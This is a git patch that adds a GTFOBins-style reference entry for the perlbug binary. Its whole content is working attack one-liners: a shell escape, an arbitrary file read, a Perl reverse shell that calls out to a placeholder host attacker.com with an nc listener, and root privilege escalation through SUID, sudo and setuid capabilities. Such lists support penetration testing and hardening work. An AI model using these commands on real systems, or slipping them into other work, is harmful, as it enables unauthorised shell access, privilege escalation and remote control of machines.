From 5d33f3c5c205c87cd784bc9417241f056ebcf8de Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E5=B7=B4=E9=83=BD=E4=B8=87?=
 <46479117+pad0van@users.noreply.github.com>
Date: Fri, 5 Aug 2022 23:45:01 +0800
Subject: [PATCH] Add perlbug

---
 _gtfobins/perlbug.md | 21 +++++++++++++++++++++
 1 file changed, 21 insertions(+)
 create mode 100644 _gtfobins/perlbug.md

diff --git a/_gtfobins/perlbug.md b/_gtfobins/perlbug.md
new file mode 100644
index 0000000..707d712
--- /dev/null
+++ b/_gtfobins/perlbug.md
@@ -0,0 +1,21 @@
+---
+functions:
+  shell:
+    - code: perlbug -e 'exec "/bin/sh";'
+  file-read:
+    - code: |
+        LFILE=file_to_read
+        perlbug -ne print $LFILE
+  reverse-shell:
+    - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
+      code: |
+        export RHOST=attacker.com
+        export RPORT=12345
+        perlbug -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
+  suid:
+    - code: ./perlbug -e 'exec "/bin/sh";'
+  sudo:
+    - code: sudo perlbug -e 'exec "/bin/sh";'
+  capabilities:
+    - code: ./perlbug -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
+---